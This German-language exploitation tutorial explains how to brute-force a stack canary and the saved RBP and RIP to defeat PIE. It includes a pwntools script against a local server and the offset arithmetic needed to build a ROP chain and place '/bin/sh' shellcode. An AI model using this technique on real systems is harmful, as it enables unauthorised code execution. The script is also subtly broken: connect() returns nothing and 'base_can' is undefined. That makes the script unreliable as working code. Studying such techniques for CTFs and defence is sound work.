BF Addresses in the Stack

Wenn du es mit einer Binärdatei zu tun hast, die durch einen Canary und PIE (Position Independent Executable) geschützt ist, musst du wahrscheinlich einen Weg finden, sie zu umgehen.

Brute-Force-Adressen

Um PIE zu umgehen, musst du eine Adresse leaken. Und wenn die Binärdatei keine Adressen leakt, ist es am besten, die im Stack gespeicherten RBP- und RIP-Werte in der verwundbaren Funktion zu brute-forcen. Wenn beispielsweise eine Binärdatei sowohl durch einen Canary als auch durch PIE geschützt ist, kannst du mit dem Brute-Forcen des Canaries beginnen, dann werden die nächsten 8 Bytes (x64) das gespeicherte RBP und die nächsten 8 Bytes das gespeicherte RIP sein.

Um das RBP und das RIP aus der Binärdatei zu brute-forcen, kannst du herausfinden, dass ein gültig geratenes Byte korrekt ist, wenn das Programm etwas ausgibt oder einfach nicht abstürzt. Die gleiche Funktion, die zum Brute-Forcen des Canaries bereitgestellt wird, kann verwendet werden, um das RBP und das RIP zu brute-forcen:

from pwn import *

def connect():
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

# CANARY BF HERE
canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

# PIE BF FROM HERE
print("Brute-Forcing RBP")
base_canary_rbp = get_bf(base_canary)
RBP = u64(base_canary_rbp[len(base_canary_rbp)-8:])
print("Brute-Forcing RIP")
base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])

Das letzte, was Sie benötigen, um das PIE zu besiegen, ist, nützliche Adressen aus den geleakten Adressen zu berechnen: die RBP und die RIP.

Von der RBP aus können Sie berechnen, wo Sie Ihre Shell im Stack schreiben. Dies kann sehr nützlich sein, um zu wissen, wo Sie die Zeichenfolge "/bin/sh\x00" im Stack schreiben werden. Um die Entfernung zwischen der geleakten RBP und Ihrem Shellcode zu berechnen, können Sie einfach einen Breakpoint nach dem Leaken der RBP setzen und überprüfen, wo sich Ihr Shellcode befindet. Dann können Sie die Entfernung zwischen dem Shellcode und der RBP berechnen:

INI_SHELLCODE = RBP - 1152

Von der RIP können Sie die Basisadresse der PIE-Binärdatei berechnen, die Sie benötigen, um eine gültige ROP-Kette zu erstellen. Um die Basisadresse zu berechnen, führen Sie einfach objdump -d vunbinary aus und überprüfen Sie die letzten Adressen der Disassemblierung:

In diesem Beispiel sehen Sie, dass nur 1 Byte und ein halbes Byte benötigt werden, um den gesamten Code zu lokalisieren. Die Basisadresse in dieser Situation wird die geleakte RIP sein, die auf "000" endet. Wenn Sie beispielsweise 0x562002970ecf geleakt haben, ist die Basisadresse 0x562002970000.

elf.address = RIP - (RIP & 0xfff)

Verbesserungen

Laut einigen Beobachtungen aus diesem Beitrag ist es möglich, dass der Server beim Leaken von RBP- und RIP-Werten nicht abstürzt, wenn einige Werte nicht die richtigen sind, und das BF-Skript denkt, es hätte die richtigen erhalten. Das liegt daran, dass einige Adressen es einfach nicht brechen werden, selbst wenn sie nicht genau die richtigen sind.

Laut diesem Blogbeitrag wird empfohlen, eine kurze Verzögerung zwischen den Anfragen an den Server einzuführen.